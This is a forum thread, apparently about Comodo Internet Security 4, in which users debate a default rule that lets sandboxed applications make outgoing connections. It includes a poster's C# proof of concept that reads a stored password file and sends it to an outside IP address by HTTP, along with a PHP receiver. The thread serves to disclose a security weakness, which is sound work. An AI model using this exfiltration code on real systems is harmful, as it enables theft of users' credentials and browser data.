Your informations can be easily steal with CIS 4 in Internet Security configuration.
I just try to make a little application, it read a file on C:\program files\Myapps and send data to a http server.
It’s sandboxing, but it’s all CIS 4 do.
No alert from the firewall because of this stupid rule that allow all outgoing connexions.
I have just one D+ alert, yes, because i need DNS for my server… But I just need to connect to a ip and i won’t have another alert expect it was sandboxed.
I take a stupid file, but imagine I upload Firefox directory for example, all cookies, saved password, history …
I know, I already delete it from all CIS 4 i install, and i advise to do the same in the French corner. But all users don’t read this forum … And It’s the default configuration …
Did you read what I said ? I just have to use an ip and not a domain and I won’t have any alert from D+ because it won’t use DNS and defense+ won’t react to this.
But I don’t own a server with my own ip. Or must I create i special network at home to show you it ?
So, i change a little the application, and I made a server with wamp on an another computer connected on a special network to be sure it’s not on y local network.
My network is in 192.168.0.0/255.255.255.0 and the server on 78.251.85.0/255.255.255.0
I try to steal a password from an application that store it into a file named mypreciousdata.dat in c:\program files\Myapps
here the code of the application in c#
using System;
using System.IO;
using System.Net;
using System.Windows.Forms;
namespace WindowsFormsApplication1
{
static class Program
{
///
/// Point d’entrée principal de l’application.
///
[STAThread]
static void Main()
{
StreamReader monStreamReader = new StreamReader(“c:/Program Files/Myapps/mypreciousdata.dat”);
string data = monStreamReader.ReadLine();
string result = “”;
MessageBox.Show("your precious data is : " + data);
WebClient client = new WebClient();
result = client.DownloadString("http://78.251.85.241/echo.php?data=" + data);
MessageBox.Show("Answer from website : " + result);
}
}
}
Code of php server
My steal data : <?php echo $_GET['data'] ?>
Here we go, I execute my application, CIS sandbox it (see test1.jpg)
And then, data is sent … php server answered me … (see test2.jpg)
Let me ask you politely - Are you okay? 88) I mean, what kind of logic is this, huh? You talk and talk and talk about prevention, but now when we ask for PREVENTION for possible exploit(s) you give these lame excuses?
Why do you add Sandbox then? FOR PREVENTION! You have said many times that D+ is almost bullet proof and no malware in the wild can bypass it, but you still added Sandbox for PREVENTION!
Sometimes Melih’s logic just baffles me and leaves me speechless 88) And arguing with him is like arguing with 5 year old who wants to go to Chuck E. Cheese.
What i am saying is: there is a risk v reward ratio, There is no 100% security, and no security vendor try to close every theoritical hole. Which means the focus has to be what really matters, which is real malware out there. No point in disturbing the user for a theoritical protection.
So why use this kind of rule ? It’s the only error here because the application won’t do anything to the system., that why D+ don’t see anything. It’s just about take an information and that all.
You made the rule because you think that it will be better for novice users, but what use novice users ? All applications that lot of people use and so, without any alert because they are already in your safe list.
So really, why put this rule whereas it can be a security hole in certain conditions ?
I think a way around this rule would be to use the white list for the firewall also, if the application is signed and part of the white list it gets access, if not you get asked. I don’t think it would be to hard to implement and that way you will have security and ease of use.
You’re talking about firewall’s Safe Mode which is present in CIS since its beginning.
I personally have a problem with the way the new firewall policy is implemented rather than there exists such thing like allow all outgoing connections mode in CIS. By adding these weird policy to Application Rules in Network Security Policy, Comodo practically rendered Firewall Security Level setting completely useless. IMHO, here is how it should be done…
these possibilities exist IF you can infect the PC in the first place.
So what is being talked about here is NOT even how to infect the PC…
it is IF they managed to infect the pc, this is how they can extract information.